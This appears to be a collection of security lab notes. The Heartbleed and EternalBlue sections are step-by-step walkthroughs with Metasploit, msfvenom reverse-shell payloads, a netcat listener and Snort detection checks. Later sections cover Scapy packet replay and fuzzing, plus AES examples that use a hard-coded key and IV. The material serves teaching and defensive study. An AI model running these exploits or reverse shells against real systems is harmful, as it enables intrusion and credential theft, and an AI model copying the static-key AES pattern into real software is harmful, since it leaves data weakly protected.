Exploitation : Heartbleed Vulnerability : Ubuntu Server 12.04

What is Heartbleed Vulnerability?

It's a vulnerability in the OpenSSL Cryptographic software Library, where it doesn't do bound check for input validation in the heartbeat extension where data can be accessible then it shouldn't be, Authorization Credentials can be seen in plain text aka leaking of information bypassing the confidentiality.

What we need:
1) Ubuntu Server - 12.04 (Target Machine)
2) Kali VM (Attack Machine)
3) Security Onion (Sniffing Interface)

In Ubuntu Server:
After setting up the Ubuntu Server, Run the following as a Root User:

# apt-get install apache2.2-common
# a2enmod ssl
# service apache2 restart
# mkdir /etc/apache2/ssl
# openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/ssl/webserver.key -out /etc/apache2/ssl/webserver.crt

The above command will create us a webserver key and certificate.

Info:
Ubuntu Server IP address: 192.168.163.140

Now we have to modify the default ssl file:

# vi /etc/apache2/sites-available/default-ssl

Edit the file with our generated key and certificate with the following commands:

ServerName 192.168.163.140:443

/etc/apache2/ssl/webserver.crt
/etc/apache2/ssl/webserver.key

After editing, save the file and run the following commands :

# apt-get install apache2-mpm-prefork
# a2ensite default-ssl
# service apache2 reload

Now our Ubuntu Server will be vulnerable to the Heartbleed.

In Security Onion:
Open a terminal and start sniffing for our eth1 interface, which is our Ubuntu Server and save it into a file called heartbleed.pcap.

# sudo tcpdump -nnttttAi eth1 -w heartbleed.pcap


In Kali VM:
Open the Web Browser, to check whether we can access our Ubuntu Server:

Now we use  Burp Suit, to simulate the HTTPS traffic and Get Requests, which will have Authorization Basic. As we are going to use this Heartbleed vulnerability, we can see the credentials in our payload. Let's try that out :

Open Burp Suit and do the following:

Open a new Tab:
Host: 192.168.163.140 (Ubuntu Server)
Post: 443

Create a fake Post Request for the payload:

In the Payload Tab, generate the Payload, upto 60, in order for it to repeat the connection over and over.

Now Open a terminal and run msfconsole: 
Just to get our heartbleed exploit ready.

# msfconsole
# search heartbleed

Now choose the info leak payload:

# use auxiliary/scanner/ssl/openssl_heartbleed

# set RHOSTS 192.168.163.140

# set VERBOSE true

Now come to Burp Suit and Start the attacks .
After starting the attack, come back to the terminal and run command: exploit
And you will see something like this:

You may not get the modified Post request first time in the payload when running the exploit, maybe hitting exploit couple of time after. Because, memory changes everytime as we run the exploit  which gives different results each time.

As you can see, we get the Authorization Basic in clear text, which shouldn't be disclosed. This may contain, credentials : Login and Passwd.

In Security Onion:
Open  squert, enter your credentials to see what type of Snort Rules are being fired in result of this exploitation:

As you can see, we have some Rules Alerting for Heartbleed Vulnerability. Open some event, check for their rule type, hex value, heartbeat request and response and payload.

Back to Security Onion terminal where we were doing tcpdump. Close that command and run the following command which open the captured file:

# tcpdump -nnttttAr heartbleed.pcap port 443 | less -Sr

As you can see, we have captured the Authorization Basic in Clear Text.

Exploitation with Eternalblue : Win7

What is Eternalblue?

It's a software vulnerability in Microsoft windows OS works by exploiting Microsoft Server Message Block 1.0 (SMB) on various Microsoft Windows versions.
SMB or Server Message block is a network file sharing protocol, which allow applications on a computer to read and write to files and to request services on the same network.

How  Eternalblue Exploit works ?

It allow us to write and overwrite the memory by sending large buffer into the SMB1 buffer. Then kernal memory pool is organized and makes the RIP pointer point to the overwritten memory to read and execute our payload.

We are going to use a standalone Eternalblue exploit model using python. This is a bufferoverflow, which allow us to attack a vulnerable Win7 VM and give us the system-level cmd.exe shell.

What we need :
Win7 VM (Vulnerable Machine)
Kali linux (Attack Machine )
(Optional) Security Onion (Sniffing Interface between Kali and Win 7)

Info: 
Kali VM IP : 192.168.163.135

Win7 VM IP: 192.168.163.130

In Win7 VM :
1) Open command prompt as an administrator
2) Type: powershell
3) To enable SBM version 1, type:
Set-ItemProperty -Path"HKLM:\SYSTEM\CurrentControlSet\Services\LammanServer\Parameters" SMB1 -Type DWORD -Value 1 -Force
4) Disable Firewall

At this point, our Win7 VM is vulnerable to Eternalblue.

(Optional) In Security Onion:
Set Security Onion, network adapter in promiscuous mode. Security Onion will ack as an Sniffing interface between Kali VM and Win7 VM.

In terminal, type:
$ sudo tcpdump -nnttttAi eth0

It will start sniffing on that interface.

In Kali VM:
1) Ping to Win7 IP, to check connections.
2) Do nmap to check whether Win7 is vulnerable to nse script which is related to SMB vulnerabilities.
3) Open terminal, and type:
$ nmap -p 445 --Script smb-vuln* 192.168.163.130

This says that Win7 vulnerable, let's test it out.

Download the Eternalblue MS17-010 from the github,
link: https://github.com/worawit/MS17-010.

Unzip the file and go to the download folder in the terminal where it will have all the file from the downloaded zip file and run the following command:

$ nasm -f bin eternalblue_kshellcode_x86.asm

This will generate a malicious payload that allow us to get a reverse shell from Win7 VM to Kali VM.

$ msfvenom -p windows/shell_reverse_tcp -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o meterpreterx86.bin EXITFUNC=thread LHOST=192.168.163.135 LPORT=4444 -b \x00\x0a\x0d

< Shikata ga nai : it can't be helped 😛>

$ cat eternalblue_kshellcode_x86 meterpreterx86.bin > sc_x86.bin

Open a new windows in Kali VM, and for netcat to start listening to (4444) this port.

$  nc -nlvp 4444

Back to old terminal where we were running our payload and run the following command.

$ python eternalblue_exploit7.py 192.168.163.130 sc_x86.bin

While running this command, my Win7 VM has been crashed, you may encounter with this issue, as we are running a buffer overflow. If it doesn't then you will get the system level access to the Win7. If it has crashed, let the Win7 system reboots and run the last command in kali again, and you will see something like this, in the terminal where we were doing netcat.

Check your Win7 VM, to verify that we got shell level access.

Voilà, 😈 you have compromised Win7 VM. 

In Security Onion: 

(Optional, but if you wanna know about rules and alerts, here you go. 😎)

Now, we go to Security Onion to Check, what type of snort alert has been occurred in result of this exploitation.

Open Squert, login with your credentials and you will see something like this. 

Open any alert, you will see rules type, check it's hex value. These rule alerts says that a exploit has been performed. 

To verify that our exploit was successful, we will check our pcap, which we were generating with tcpdump in Security Onion.

Open terminal and type the following command:

$ tcpdump -nnttttAr eternalblue.pcap | less -Sr

You can see, we get the SMB vulnerability , running at port 445.

Here, we have got the Win7 access:

As you can see in the pcap, we have got the system level access. It shows us in plain text. It's the same as what we have with win7 VM, command prompt. 

Packet Replay in Scapy

What is Scapy ?
Scapy, it's a tool, a utility used for modifying our packet and then send them over the network. With scapy, it's huge possibility to perform any sort of actions like Scanning, tracerouting, network discovery, attacks, hping most of the Nmap functions, arp-spoofing, arp-poisoning, tcpdump, VoIP decoding, WEP encryption... you name it.

Here, we'll be performing TCP Handshake, then we Capture those packets and do Replay in Scapy.

TCP 3-Way Handshake and Packet Replay: 
# Scapy Console

>>>ip = IP(src='192.168.163.133', dst='192.168.163.135')
>>>SYN = TCP(sport=1024, dport=80, flags='S', seq=12345)
>>>packet = ip/SYN
>>>SYNACK = sr1(packet)
>>>ack = SYNACK.seq + 1
>>>ACK = TCP(sport=1024, dport=80, flags='A', seq=12346, ack=ack)
>>>send(ip/ACK)
>>>PUSH = TCP(sport=1024, dport=80, flags='', seq=12346, ack=ack)
>>>data = "HELLO!"
>>>send(ip/PUSH/data)



# Run the Wireshark and Save the capture as tcp.pcap
# Apply filer for "TCP" and you'll see something like this.
# I am getting Reset back as port is close on this tcp.

# Replay the saved tcp.pcap packet and apply filter "tcp" to view tcp 3 way handshake.

>>>packet = rdpcap('tcp.pcap')
>>>p.show()
>>>packet[TCP].summary()

# Run this and in scapy console, you'll get something like this.

# Python Script for TCP Handshake:

#!/usr/bin/env python 
from scapy.all import *
ip = IP(src='192.168.163.133', dst='192.168.163.135')
SYN = TCP(sport=1024, dport=80, flags='S', seq=12345)
packet = ip/SYN
SYNACK = sr1(packet)
ack = SYNACK.seq + 1
ACK = TCP(sport=1024, dport=80, flags='A', seq=12346, ack=ack)
send(ip/ACK)
PUSH = TCP(sport=1024, dport=80, flags='', seq=12346, ack=ack)
data = "HELLO!"
send(ip/PUSH/data)


# Python Script for Packet Replay 

from scapy.all import *
pkt = rdpcap('tcp.pcap') 
for packet in pkt:
     print packet[tcp].summary()

Cryptography

What is Cryptography ?

It is a process of providing security to the information and resources from unauthorized access.

Process includes converting data into encrypted data and then decrypt it into original data

Cryptography follow CIA Triad: Confidentiality Integrity Availability

Confidentiality: Protect information from 3rd party.

Integrity: Information should not be altered in any form.

Availability: To be available when called upon via authorized personage.

Why Cryptography?

It Makes Secure Web sites and Safe electronic transmission (Secure Key Exchange)

It Supports message authentication as well as encryption (Prevent us form MITM attack)

Types of Cryptography

Symmetric Cryptography:

It uses same keys to encrypt and decrypt data.

Process:  Sender->data->key->cipher text->key->data->Receiver

Where both the sender and the receiver should know the secret key that is used to encrypt and decrypt the data.

Types of Symmetric Cryptography:

Stream Cipher: 

Process:  Sender -> plain text -> cipher -> send over -> Receiver

Algorithm uses: RC4

Block Cipher: 

Process: Sender -> plain text -> Break text in blocks -> Encrypt 1st block ->Add the 1st block cipher to next 2nd block sequence -> to next block... till the last block  -> send over -> Receiver

Algorithm uses: DES, 3DES, AES, Blowfish, Twofish

Symmetric Examples: Blowfish, Twofish, AES, RC-4,5,6, DES, 3DES

Algorithms: AES-128,192,256

Strength:

It is faster then Asymmetric and it is difficult to crack.

It does file encryption and files in storage using AES algorithm

It does VPN encryption uses AES256 algorithm.

Financial transaction security uses 3DES algorithm.

Weakness:

It needs individual keys for every other session for secure transmission.

It does not provide non-repudiation.

Lacks in message, website security and key transfer.

Asymmetric Cryptography:

It uses two different keys private and public key. For one to encrypt and other key to decrypt.

Process:  Sender->data->Receiver's-Public-key->cipher text->Private-key->data->Receiver

Asymmetric Examples: RSA DSA ECC

Algorithms:Diffie-Hellman, RSA, ECC, ElGamal, DSa

Strength:

It give us message encryption and authentication, which helps us from Men In The Middle Attack.

Website Security and digital signature.

Secure key exchange and management.

Weakness:

It is slower then Symmetric Key Exchange.

It works best along with Symmetric Key Cryptography.

Cryptography Python Examples:

Library Used: pycrypto

Python Version: Python 3.6.3

Message Length: Multiple of 16

Encryption Example:

#sample script for encrypting text
from Crypto.Cipher import AES

obj = AES.new('This is a key123', AES.MODE_CBC, 'This is an IV456')

message = "May The Force Be With Us        "

#Encryption

ciphertext = obj.encrypt(message)

print('\n', ciphertext)

Output:

  xb'l\xac\x18&\xadv\xa6\x8a\x9bZ\xfd}\xf9\xe6"\x9e\x9cX\'N8g\xe2\xb5,!F\xddJ\xe3\xa7\xab'

Decryption Example:

#sample Script for encryption and decryption
from Crypto.Cipher import AES

obj = AES.new('This is a key123', AES.MODE_CBC, 'This is an IV456')

message = "May The Force Be With Us        "

#Encryption

ciphertext = obj.encrypt(message)

print('\n', ciphertext, '\n')

obj2 = AES.new('This is a key123', AES.MODE_CBC, 'This is an IV456')

#Decryption

result = obj2.decrypt(ciphertext)

print(result, '\n')

Output:

b'l\xac\x18&\xadv\xa6\x8a\x9bZ\xfd}\xf9\xe6"\x9e\x9cX\'N8g\xe2\xb5,!F\xddJ\xe3\xa7\xab'

b'May The Force Be With Us       

Another Example of Both Encryption and Decryption:

#Sample Encryption and Decryption

from Crypto.Cipher import AES

obj = AES.new('This is a key123', AES.MODE_CBC, 'This is an IV456')

message = "This is some text we need to encrypt because it's very secret   "

#Encryption

ciphertext = obj.encrypt(message)

print('\n', ciphertext, '\n')

obj2 = AES.new('This is a key123', AES.MODE_CBC, 'This is an IV456')

#Decryption

result = obj2.decrypt(ciphertext)

print(result, '\n')

Output:

b'G\x0c\xc9:\xd2k\xd7g\xf0\x9d\xda\xb2\xc0\x10\x1c\x97E\xb2\xc4\xce\x9f\xb6\xd6\x05G\x89\xa1<\xe6\xd5{0\xe7\xe6\xdd[\xe8P\xda\xd8P\x04\xcfB\xb2{v\xb8\x03\x0f\xb9\xce\xc3d\xaa_\xa0\x99\xef\xe2\xb54\xdb\\'

b"This is some text we need to encrypt because it's very secret   "

Fuzzing HTTP Request In Python With Scapy

What is Fuzzing ?

Fuzzing or Fuzz Testing is a testing technique which is used for finding bugs, coding errors or any security loopholes using injecting malformed or modifying data inside software or OS or Network.

What is Scapy ?

Scapy is packet manipulation tool for network.
It is able to decode or forge packets, send them over wire, capture the packets, send requests and replies, etc.

Fuzzing HTTP Get Request In Python With Scapy:

#Sample Fuzzing Script
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import *
import sys

conf.L3socket
conf.L3socket=L3RawSocket

def main():
    syn = IP(dst='localhost') / TCP(dport=80, flags='S')
    syn_ack = sr1(syn, iface='lo')
    getStr = 'GET / HTTP/1.1\r\nHost: localhost\r\n\r\n'
    request = IP(dst='localhost') / TCP(dport=80, sport=syn_ack[TCP].dport,
                 seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq + 1, flags='A') / getStr
    reply = sr1(request, iface='lo')
 
if __name__== "__main__":
    main()


Test Cases and Response:

Modifying GET Request:

e.g., < getStr = 'GET / HTTP/1111\r\nHost: localhost\r\n\r\n' >

e.g., <getStr = 'GET / HTTP/1111\r\nContent-Lenght: -1111\r\nHost: localhost\r\n\r\n >

e.g., <getStr = 'GET / HTTP/1111\r\nAccept: png/txt\r\nHost: localhost\r\n\r\n' >

e.g.,<getStr = 'GET / HTTP/1111\r\nKeep-Alive: 10\r\nHost: localhost\r\n\r\n'>

e.g.,<getStr = 'GET / HTTP/1111\r\nAccept-Encoding: jpeg. xml\r\nHost: localhost\r\n\r\n'>